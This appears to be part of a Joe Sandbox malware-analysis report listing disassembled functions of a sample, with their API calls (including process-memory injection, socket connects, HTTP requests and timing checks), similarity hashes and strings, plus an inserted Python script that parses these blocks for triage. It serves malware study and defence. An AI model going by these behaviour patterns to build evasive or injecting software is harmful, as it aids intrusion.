                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                                                                                                  • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                                                                                                                                  • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                                                                                                  • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                                                                                                  • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                                                                                                                                  • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                                                                                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: ErrorLast$closesocketconnectinet_addrsocket
• String ID:
• API String ID: 245547762-0
• Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
• Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
• Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
• Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
APIs
• DeleteObject.GDI32(00000000), ref: 004471D8
• ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
• SelectObject.GDI32(?,00000000), ref: 00447228
• BeginPath.GDI32(?), ref: 0044723D
• SelectObject.GDI32(?,00000000), ref: 00447266
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Object$Select$BeginCreateDeletePath
• String ID:
• API String ID: 2338827641-0
• Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
• Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
• Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
• Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
APIs
• Sleep.KERNEL32(00000000), ref: 00434598
• QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
• Sleep.KERNEL32(00000000), ref: 004345D4
• QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: CounterPerformanceQuerySleep
• String ID:
• API String ID: 2875609808-0
• Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
• Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
• Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
• Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
APIs
• GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0041F613
• GetCurrentProcessId.KERNEL32 ref: 0041F61F
• GetCurrentThreadId.KERNEL32 ref: 0041F627
• GetTickCount.KERNEL32 ref: 0041F62F
• QueryPerformanceCounter.KERNEL32(?), ref: 0041F63B
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
• String ID:
• API String ID: 1445889803-0
• Opcode ID: 1135723e8045fd594a3b533cc5e145dd408aa02f7e9604b94c9c62fb4b922c37
• Instruction ID: c7bf038de7359fae01b92e37b7086805794b770b917a01077a49d05dcccb2548
• Opcode Fuzzy Hash: 1135723e8045fd594a3b533cc5e145dd408aa02f7e9604b94c9c62fb4b922c37
• Instruction Fuzzy Hash: 7B11E572D002249FCB208BF8DD4869EB7F4EF18351F510A76D905E7220DA749D468788
APIs
• GetDlgItem.USER32(?,000003E9), ref: 00460C17
• GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
• MessageBeep.USER32(00000000), ref: 00460C46
• KillTimer.USER32(?,0000040A), ref: 00460C68
• EndDialog.USER32(?,00000001), ref: 00460C83
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: BeepDialogItemKillMessageTextTimerWindow
• String ID:
• API String ID: 3741023627-0
• Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
• Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
• Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
• Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
APIs
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Destroy$DeleteObjectWindow$Icon
• String ID:
• API String ID: 4023252218-0
• Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
• Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
• Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
• Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
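The "APIs" blocks above are what an analyst actually triages in this part of the report: each is one function, its imported calls in address order, and a "API ID" tag that Joe Sandbox uses to find similar functions across samples. The script below is an added example, not Joe Sandbox or IDA-plugin code. It parses blocks in exactly this layout, rebuilds the "API ID" tag under a rule inferred from the tags printed on this page (CamelCase-split each API name, drop tokens shorter than four characters, bucket tokens by frequency, sort each bucket alphabetically, join buckets most-frequent-first with "$"; the real implementation is not shown here, so treat the rule as an assumption that happens to reproduce every tag on this page), and attaches triage labels. The labels are analyst heuristics: the GetSystemTimeAsFileTime/GetCurrentProcessId/GetCurrentThreadId/GetTickCount/QueryPerformanceCounter sequence is the MSVC CRT stack-cookie seed (__security_init_cookie) and is compiler boilerplate rather than malware logic, whereas Sleep bracketed by QueryPerformanceCounter is the execution-timing check the report's signature list refers to. The sample text is an excerpt copied from the blocks above.

```python
"""Parse Joe Sandbox IDA-plugin "APIs" blocks, rebuild the "API ID" tag and
label functions for triage.  Added example, not Joe Sandbox code: the tag
rule is inferred from this report's own tags; the labels are heuristics."""
import re
from collections import Counter

# "• Sleep.KERNEL32(00000000), ref: 00434598"  or  "• GetTickCount.KERNEL32 ref: 0041F62F"
CALL_RE = re.compile(
    r"^(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
# CamelCase split; names without capitals (socket, inet_addr) stay whole.
TOKEN_RE = re.compile(r"[A-Z][a-z0-9]*|[a-z0-9_]+")

# Triage heuristics (assumptions): every listed API must occur in the function.
PATTERNS = {
    "crt-security-cookie-init": {"GetSystemTimeAsFileTime", "GetCurrentProcessId",
                                 "GetCurrentThreadId", "GetTickCount",
                                 "QueryPerformanceCounter"},
    "timing-check": {"Sleep", "QueryPerformanceCounter"},
    "raw-winsock-connect": {"socket", "connect", "inet_addr"},
}


def parse_blocks(text):
    """One dict per "APIs" block: parsed calls plus the API ID the report printed."""
    blocks, cur = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if line == "APIs":
            cur = {"calls": [], "report_api_id": None}
            blocks.append(cur)
        elif cur is not None and line.startswith("API ID:"):
            cur["report_api_id"] = line.split(":", 1)[1].strip()
        elif cur is not None:
            m = CALL_RE.match(line)
            if m:                      # non-call lines (Memory Dump Source, ...) are skipped
                cur["calls"].append(m.groupdict())
    return blocks


def api_id(calls, min_len=4):
    """Inferred rule: split names on capitals, drop short tokens (Get, Dlg, W, Id,
    Ext, Pen vanish), bucket by occurrence count, sort each bucket, join with '$'."""
    counts = Counter(tok for c in calls
                     for tok in TOKEN_RE.findall(c["name"]) if len(tok) >= min_len)
    buckets = {}
    for tok, n in counts.items():
        buckets.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(buckets[n])) for n in sorted(buckets, reverse=True))


def classify(calls):
    names = {c["name"] for c in calls}
    return sorted(label for label, need in PATTERNS.items() if need <= names)


def triage(text):
    """One row per function: call sites, rebuilt tag, agreement with report, labels."""
    rows = []
    for b in parse_blocks(text):
        tag = api_id(b["calls"])
        rows.append({"refs": [c["ref"] for c in b["calls"]], "api_id": tag,
                     "matches_report": tag == b["report_api_id"],
                     "labels": classify(b["calls"])})
    return rows


# Excerpt copied from the report blocks above (constructed test input).
SAMPLE = """\
APIs
• DeleteObject.GDI32(00000000), ref: 004471D8
• ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
• SelectObject.GDI32(?,00000000), ref: 00447228
• BeginPath.GDI32(?), ref: 0044723D
• SelectObject.GDI32(?,00000000), ref: 00447266
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Object$Select$BeginCreateDeletePath
APIs
• Sleep.KERNEL32(00000000), ref: 00434598
• QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
• Sleep.KERNEL32(00000000), ref: 004345D4
• QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
• API ID: CounterPerformanceQuerySleep
APIs
• GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0041F613
• GetCurrentProcessId.KERNEL32 ref: 0041F61F
• GetCurrentThreadId.KERNEL32 ref: 0041F627
• GetTickCount.KERNEL32 ref: 0041F62F
• QueryPerformanceCounter.KERNEL32(?), ref: 0041F63B
• API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
APIs
• SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
• DeleteObject.GDI32(?), ref: 00455736
• DeleteObject.GDI32(?), ref: 00455744
• DestroyIcon.USER32(?), ref: 00455752
• DestroyWindow.USER32(?), ref: 00455760
• API ID: DeleteDestroyObject$IconMessageSendWindow
"""

if __name__ == "__main__":
    for row in triage(SAMPLE):
        print(row)
```

Run it on a saved copy of this page section and any row with `matches_report` false means the inferred tag rule has a case the page's examples did not cover; a row labelled crt-security-cookie-init can be skipped during manual review, while timing-check and raw-winsock-connect rows are where to start.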
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00455744
• DestroyIcon.USER32(?), ref: 00455752
• DestroyWindow.USER32(?), ref: 00455760
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: DeleteDestroyObject$IconMessageSendWindow
• String ID:
• API String ID: 1489400265-0
APIs
  • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
• DestroyWindow.USER32(?), ref: 00455728
• DeleteObject.GDI32(?), ref: 00455736
• DeleteObject.GDI32(?), ref: 00455744
• DestroyIcon.USER32(?), ref: 00455752
• DestroyWindow.USER32(?), ref: 00455760
Similarity
• API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
• String ID:
• API String ID: 1042038666-0
APIs
Similarity
• API ID: Path$ObjectStroke$DeleteFillSelect
• String ID:
• API String ID: 2625713937-0
APIs
• CoInitialize.OLE32(00000000), ref: 0046E505
• CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
• CoUninitialize.OLE32 ref: 0046E53D
Strings
Similarity
• API ID: CreateInitializeInstanceUninitialize
• String ID: .lnk
• API String ID: 948891078-24824748
APIs
• GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
• SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
• SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
Strings
Similarity
• API ID: ItemMenu$Info$Default
• String ID: 0
• API String ID: 1306138088-4108050209
APIs
  • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
  • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
  • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
  • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
  • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
• SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
Strings
Similarity
• API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
• String ID: @
• API String ID: 4150878124-2766056989
APIs
• ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
• CloseHandle.KERNEL32(?), ref: 00457E09
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: CloseExecuteHandleShell
• String ID: <$@
• API String ID: 283469938-1426351568
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
• String ID:
• API String ID: 3705125965-3916222277
APIs
• GetMenuItemInfoW.USER32 ref: 0045FAC4
• DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
• DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Menu$Delete$InfoItem
• String ID: 0
• API String ID: 135850232-4108050209
APIs
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
• GetWindowLongW.USER32(?,000000F0), ref: 0045087D
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Window$Long
• String ID: SysTreeView32
• API String ID: 847901565-1698111956
APIs
• LoadLibraryA.KERNEL32(?), ref: 00434B10
• GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
• FreeLibrary.KERNEL32(?), ref: 00434B9F
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: AU3_GetPluginDetails
• API String ID: 145871493-4132174516
APIs
  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
• lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
• MoveFileW.KERNEL32(?,?), ref: 0044BC3F
• SHFileOperationW.SHELL32(?), ref: 0044BD17
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: File$FullMoveNameOperationPathlstrcmpi
• String ID: \*.*
• API String ID: 1148786053-1173974218
APIs
• SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: MessageSend$Window
• String ID: SysMonthCal32
• API String ID: 2326795674-1439706946
APIs
• DestroyWindow.USER32(00000000), ref: 00450A2F
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: DestroyWindow
• String ID: msctls_updown32
• API String ID: 3375834691-2298589950
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D79D
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID: \VH
• API String ID: 1682464887-234962358
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D79D
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID: \VH
• API String ID: 1682464887-234962358
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D87B
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID: \VH
• API String ID: 1682464887-234962358
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D37E
• GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorMode$InformationVolume
                                                                                                                                                                  • String ID: \VH
                                                                                                                                                                  • API String ID: 2507767853-234962358
                                                                                                                                                                  • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                                                                                                  • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                                                                                                                                  • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                                                                                                  • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                                                                                                                                  • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                                                                                                                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
